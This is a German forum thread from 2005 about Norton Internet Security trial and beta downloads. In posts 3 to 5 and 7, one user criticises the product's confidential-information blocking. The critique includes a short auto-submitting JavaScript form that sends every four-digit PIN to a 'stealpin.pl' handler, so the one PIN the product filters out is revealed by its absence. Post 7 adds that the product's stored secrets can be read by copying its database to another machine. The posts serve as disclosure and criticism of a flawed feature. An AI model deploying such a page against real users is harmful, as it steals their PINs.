WinFuture-Forum.de: Norton Internet Security 2005 Free Trialware - WinFuture-Forum.de

Zum Inhalt wechseln

Beiträge in diesem Forum erhöhen euren Beitragszähler nicht.
Seite 1 von 1

Norton Internet Security 2005 Free Trialware


#1 Mitglied ist offline   Johannes Rasmus 

  • Gruppe: Mitglieder
  • Beiträge: 2
  • Beigetreten: 23. Februar 05
  • Reputation: 0

geschrieben 23. Februar 2005 - 17:25

Changes:

* Norton Internet Worm Protection stops certain damaging Internet worms at the point of entry
* Automatically turns the firewall back on after a set period of time if you need to turn it off temporarily
* Confidential information blocking now lets you send personal data to sites you trust while protecting you from sending it to sites you don't
* Filters email coming to Yahoo! Mail accounts
* Helps detect and filter fraudulent and explicit email
* Automatically synchronizes its Allowed List with your POP3 email address books
* Works with Outlook to filter junk email from Hotmail and MSN Mail accounts



http://spftrl.digitalriver.com/pub/symante.../NIS_Retail.EXE
0

Anzeige



#2 Mitglied ist offline   Hauner 

  • Gruppe: aktive Mitglieder
  • Beiträge: 2.297
  • Beigetreten: 03. Januar 05
  • Reputation: 0
  • Geschlecht:Männlich

geschrieben 23. Februar 2005 - 17:35

Ich denke, dass das bekannt ist. Das gibt es ja schon seit Ende 2004. Das hat jetzt aber nicht wirklich etwas mit "News" zutun.

Dieser Beitrag wurde von Hauner bearbeitet: 23. Februar 2005 - 17:36

0

#3 Mitglied ist offline   Rika 

  • Gruppe: aktive Mitglieder
  • Beiträge: 11.533
  • Beigetreten: 11. Juni 03
  • Reputation: 2
  • Geschlecht:Männlich

geschrieben 23. Februar 2005 - 21:36

Zitat

* Confidential information blocking now lets you send personal data to sites you trust while protecting you from sending it to sites you don't


<form name="x" action="./stealpin.pl" method="post">
<textarea name="y"></textarea>
</form>
<script type="text/javascript">
for(a=0; a<=9; a++)
  for(b=0; b<=9; b++)
    for(c=0; c<=9; c++)
      for(d=0; d<=9; d++)
        document.x.y.value+=a.toString()+b.toString()+c.toString()+d.toString()+".";
document.x.submit();
// alert("Thanks for your PIN, dumbass.");
</script>


Einfach den Wert raussuchen der _nicht_ übertragen wurde und schon hat man die PIN, deren Bekanntwerden bei Übertragung eigentlich verhindert werden sollte.
Die Leute von Symantec lernen's nie...




* und für die Minimalisten unter euch:
<form name="x" action="x.pl"><textarea name="y"></textarea></form><script type="text/javascript">
for(a=-1;a++<11;for(b=-1;b++<1001;document.x.y.value+=a+""+b+"."));document.x.submit();
</script>

Dieser Beitrag wurde von Rika bearbeitet: 23. Februar 2005 - 21:44

Konnichiwa. Manga wo shitte masu ka? Iie? Gomenne, sonoyouna koto ga tabitabi arimasu. Mangaka ojousan nihongo doujinshi desu wa 'Clamp X', 'Ayashi no Ceres', 'Card Captor Sakura', 'Tsubasa', 'Chobits', 'Sakura Taisen', 'Inuyasha' wo 'Ah! Megamisama'. Hai, mangaka gozaimashita desu ni yuujin yori.
Eingefügtes Bild
Ja, mata ne!

(For sending email please use OpenPGP encryption and signing. KeyID: 0xA0E28D18)
0

#4 Mitglied ist offline   Stan 

  • Gruppe: aktive Mitglieder
  • Beiträge: 7.013
  • Beigetreten: 06. Juni 04
  • Reputation: 35
  • Geschlecht:Männlich
  • Wohnort:München

geschrieben 23. Februar 2005 - 21:58

Zitat (Rika: 23.02.2005, 21:36)

<form name="x" action="./stealpin.pl" method="post">
<textarea name="y"></textarea>
</form>
<script type="text/javascript">
for(a=0; a<=9; a++)
  for(b=0; b<=9; b++)
    for(c=0; c<=9; c++)
      for(d=0; d<=9; d++)
        document.x.y.value+=a.toString()+b.toString()+c.toString()+d.toString()+".";
document.x.submit();
// alert("Thanks for your PIN, dumbass.");
</script>


Einfach den Wert raussuchen der _nicht_ übertragen wurde und schon hat man die PIN, deren Bekanntwerden bei Übertragung eigentlich verhindert werden sollte.
Die Leute von Symantec lernen's nie...
* und für die Minimalisten unter euch:
<form name="x" action="x.pl"><textarea name="y"></textarea></form><script type="text/javascript">
for(a=-1;a++<11;for(b=-1;b++<1001;document.x.y.value+=a+""+b+"."));document.x.submit();
</script>

<{POST_SNAPBACK}>

Was is das für ein code Rika?
0

#5 Mitglied ist offline   Rika 

  • Gruppe: aktive Mitglieder
  • Beiträge: 11.533
  • Beigetreten: 11. Juni 03
  • Reputation: 2
  • Geschlecht:Männlich

geschrieben 23. Februar 2005 - 22:32

Das ist ein stinknormales Script mit dem man ganz leicht eine vierstellige PIN herausfindet, deren Übertragung durch den angeblichen Schutz verhindert werden soll. Indes, _ohne_ diesen tollen Schutz wäre dies nicht passiert.

Kurzum: Dieses Feature ist nicht nur unnütz, es ist gefährlich. Wie so viele andere der Features auch...
Konnichiwa. Manga wo shitte masu ka? Iie? Gomenne, sonoyouna koto ga tabitabi arimasu. Mangaka ojousan nihongo doujinshi desu wa 'Clamp X', 'Ayashi no Ceres', 'Card Captor Sakura', 'Tsubasa', 'Chobits', 'Sakura Taisen', 'Inuyasha' wo 'Ah! Megamisama'. Hai, mangaka gozaimashita desu ni yuujin yori.
Eingefügtes Bild
Ja, mata ne!

(For sending email please use OpenPGP encryption and signing. KeyID: 0xA0E28D18)
0

#6 Mitglied ist offline   ox_eye 

  • Gruppe: aktive Mitglieder
  • Beiträge: 1.446
  • Beigetreten: 12. August 04
  • Reputation: 2
  • Geschlecht:Männlich

geschrieben 24. Februar 2005 - 11:29

@Rika

Verstehe ich das richtig ;) : Dein Code läuft neben dem von Symantec und dadurch wird die Sicherheit von Symantec ausgehebelt?
0

#7 Mitglied ist offline   Rika 

  • Gruppe: aktive Mitglieder
  • Beiträge: 11.533
  • Beigetreten: 11. Juni 03
  • Reputation: 2
  • Geschlecht:Männlich

geschrieben 24. Februar 2005 - 14:29

Bitte lies den Code und verstehe ihn.
Es werden einfach alle möglichen 10000 vierstelligen PINs als Form-Text erzeugt und an den Server zurückgesendet. Ganz normal, ganz legitim. Die PIN, die man in die Symandreck-Software als schützenswerte Information eingegeben hat, wird aus der Übertragung entfernt. Es kommen 9999 PINs beim Server an - tja, und die, die fehlt, ist die gesuchte PIN.

(Nebenbei, wie Volker Birks Analysen zeigen reicht es auch aus die Datenbankdatei von NIS auf einen anderen Rechner zu kopieren, einen Benutzer mit gleichem Kontonamen einzurichten, NIS zu installieren und die Datenbankdatei zu ersetzen - und schon kann man ohne Probleme die eingegebenen Information wieder lesen. Tolle Verschlüsselung, die den Benutzernamen als Key nutzt...)
Konnichiwa. Manga wo shitte masu ka? Iie? Gomenne, sonoyouna koto ga tabitabi arimasu. Mangaka ojousan nihongo doujinshi desu wa 'Clamp X', 'Ayashi no Ceres', 'Card Captor Sakura', 'Tsubasa', 'Chobits', 'Sakura Taisen', 'Inuyasha' wo 'Ah! Megamisama'. Hai, mangaka gozaimashita desu ni yuujin yori.
Eingefügtes Bild
Ja, mata ne!

(For sending email please use OpenPGP encryption and signing. KeyID: 0xA0E28D18)
0

#8 Mitglied ist offline   swissboy 

  • Gruppe: aktive Mitglieder
  • Beiträge: 1.299
  • Beigetreten: 29. Dezember 04
  • Reputation: 2
  • Wohnort:127.0.0.1

geschrieben 28. Dezember 2005 - 15:17

Norton Internet Security 2006 Public Beta v9.1 mit LiveUpdate v3.0
für Windows 2000 und Windows XP

Lizenztyp: Shareware $69.99
Homepage: www.symantec.com/sabu/nis/nis_pe/
Beta-Homepage: www.symantec.com/public_beta/nis_index.html
Direkt-Download (42.7MB): NIS_30TD.EXE


PS: Ich "vermittle" lediglich die Verfügbarkeit dieser Beta, nicht mehr und nicht weniger.

Dieser Beitrag wurde von swissboy bearbeitet: 28. Dezember 2005 - 15:52

0

#9 Mitglied ist offline   nim 

  • Gruppe: Redaktion
  • Beiträge: 2.347
  • Beigetreten: 20. Januar 02
  • Reputation: 2

geschrieben 28. Dezember 2005 - 15:46

super, und ich darf dann das feuer löschen...
0

#10 Mitglied ist offline   vodafone 

  • Gruppe: aktive Mitglieder
  • Beiträge: 99
  • Beigetreten: 03. Juli 03
  • Reputation: 0

geschrieben 28. Dezember 2005 - 17:16

Beitrag anzeigenZitat (swissboy: 28.12.2005, 15:17)

Norton Internet Security 2006 Public Beta v9.1 mit LiveUpdate v3.0
für Windows 2000 und Windows XP

Lizenztyp: Shareware $69.99
Homepage: www.symantec.com/sabu/nis/nis_pe/
Beta-Homepage: www.symantec.com/public_beta/nis_index.html
Direkt-Download (42.7MB): NIS_30TD.EXE
PS: Ich "vermittle" lediglich die Verfügbarkeit dieser Beta, nicht mehr und nicht weniger.


Gibt es schon lange die bringen seit anfang november eine Beta nur es ist nichts wirklich neues, auser das Live updater 3.0 denn es schon als dowmload gibt
0

#11 _gani7777_

  • Gruppe: Gäste

geschrieben 28. Dezember 2005 - 17:32

Stimmt genau. :unsure:

Habe die News aber ins Beta - Bereich gepostet als im News - Bereich. :lol:

Link : Norton Internet Security 2006 Beta Version 9.1
0

#12 Mitglied ist offline   swissboy 

  • Gruppe: aktive Mitglieder
  • Beiträge: 1.299
  • Beigetreten: 29. Dezember 04
  • Reputation: 2
  • Wohnort:127.0.0.1

geschrieben 28. Dezember 2005 - 17:48

Beitrag anzeigenZitat (vodafone: 28.12.2005, 17:16)

Gibt es schon lange die bringen seit anfang november eine Beta nur es ist nichts wirklich neues, auser das Live updater 3.0 denn es schon als dowmload gibt

Hier scheint es sich aber um eine neuere Version zu handeln. Die im Download enthalten Setup-Dateien sind alle vom 19. oder 20.12. (z.B. die NAV.msi ist vom 19.12.).
0

Thema verteilen:


Seite 1 von 1

1 Besucher lesen dieses Thema
Mitglieder: 0, Gäste: 1, unsichtbare Mitglieder: 0